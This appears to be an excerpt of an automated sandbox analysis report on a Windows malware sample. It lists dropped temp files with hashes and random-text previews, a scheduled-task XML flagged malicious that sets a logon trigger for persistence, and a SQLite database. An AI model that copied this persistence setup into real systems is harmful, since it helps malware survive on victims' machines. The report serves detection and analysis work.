                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                      C:\Users\user\AppData\Local\Temp\tmp4EE5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp5831.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1579
                      Entropy (8bit):5.101595782645726
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgergYrFdOFzOzN33ODOiDdKrsuTXv
                      MD5:4F0D8D3BCFC5AEA89CF814AD1C19A976
                      SHA1:2F2F2DCE5C66D4C4934D28DD452CCCA80F887DFE
                      SHA-256:4008D37FE4E018E1CD1C748DDE3022784D7127113AB7FE470853D3B945232CB2
                      SHA-512:31E1CD970F0341BDD59088C814F71B5736673C926B7AFD4D09CF52805FF07AAE94FE8083623AC181217029BEEDDD216E07DD98C72717A9237FBF906F7BE6CC25
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\tmp5971.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                      C:\Users\user\AppData\Local\Temp\tmp5972.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                      C:\Users\user\AppData\Local\Temp\tmp5973.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                      C:\Users\user\AppData\Local\Temp\tmp5984.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp5985.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                      C:\Users\user\AppData\Local\Temp\tmp5986.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                      C:\Users\user\AppData\Local\Temp\tmp5987.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                      C:\Users\user\AppData\Local\Temp\tmp5998.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp5BB6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
